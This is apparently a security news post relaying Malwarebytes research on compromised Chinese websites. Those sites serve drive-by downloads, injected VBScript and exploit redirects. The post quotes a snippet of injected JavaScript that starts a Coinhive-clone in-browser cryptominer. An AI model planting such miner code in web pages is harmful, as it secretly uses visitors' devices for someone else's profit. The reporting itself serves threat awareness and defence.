According to a research performed by Malwarebytes, sometimes are identified some bizarre findings or patterns we haven’t seen before. This was the case with a particular drive-by download attack planted on Chinese websites. 

“For years we have cataloged thousands of Chinese websites injected with the same malicious and rudimentary VBScript code. Even to this day, you can find a countless number of sites that have been (or still are) compromised with that pattern, and most of them happen to be hosted in China,” said Malwarebytes.

urlquery_results

This campaign was detected because Malwarebytes researchers observe an abnormal situation, namely external content embedded in iframes via scripts.

site_view1

For instance, we find a reference to a Coinhive clone:

var miner = new ProjectPoi.User('LUdKfdXyeXp9sQZf1pphGOrY', 'john-doe', {
 threads: navigator.hardwareConcurrency,
 autoThreads: false,
 throttle: 0.2,
 forceASMJS: false
});
 miner.start();

 

Coinhive_clone1

 

Malwarebytes wrote:

We are unsure whether this is a pure ripoff (the website template is almost identical), but one is different from the other in that the Chinese version (hosted at ppoi[.]org) only takes a 10 percent commission as opposed to 30 percent for Coinhive.

 

也就是说,您将获得挖矿收益的90%,与矿池不同,这个收益是固定的,不论是否爆块您都将获得该笔收益 我们希望保留10%来补偿不爆块的损失,维持服务器的运行等 I.e. you get 90% of the average XMR we earn. Unlike a traditional mining pool, this rate is fixed, regardless of actual blocks found and the luck involved finding them. We keep 10% for us to operate this service and to (hopefully) turn a profit

 

Finally, the most interesting aspect here is the redirection to a server hosting a few exploits as described in the diagram below:

Flow

 

 

Official report here. Enjoy!